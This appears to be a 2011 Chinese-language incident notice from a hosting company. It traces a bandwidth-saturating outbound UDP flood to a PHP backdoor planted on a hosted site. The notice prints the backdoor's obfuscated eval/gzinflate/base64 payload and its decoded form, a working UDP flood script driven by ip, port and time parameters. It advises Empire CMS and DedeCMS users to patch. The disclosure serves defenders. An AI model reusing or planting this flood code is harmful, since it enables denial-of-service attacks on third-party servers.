近日我司多台服务器遭受不明UDP流量攻击,带宽占用非常之严重,基本是100%,一般徘徊在97%-99%之间,最初以为是黑客攻击我司服务器,经抓包分析,发现问题是司虚拟主机站点一个php文件在发送大量UDP包导致。此php文件内容为:
/* gl */ eval(gzinflate(base64_decode('
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw 6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4 wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG 3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1 3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/')));
经过N次解密后的代码: $packets = 0; $ip = $_GET[\'ip\']; $rand = $_GET[\'port\']; set_time_limit(0); ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time(); print \"Flooded: $ip on port $rand
\"; $max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){ $out .= \"X\"; } while(1){ $packets++; if(time() > $max_time){ break; }
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\"; ?>
此PHP木马。经常出现于帝国及DEDECMS,请使用此程序的用户及时打补丁,以免被黑客入侵使用此木马攻击其它服务器。
2011-04-19
|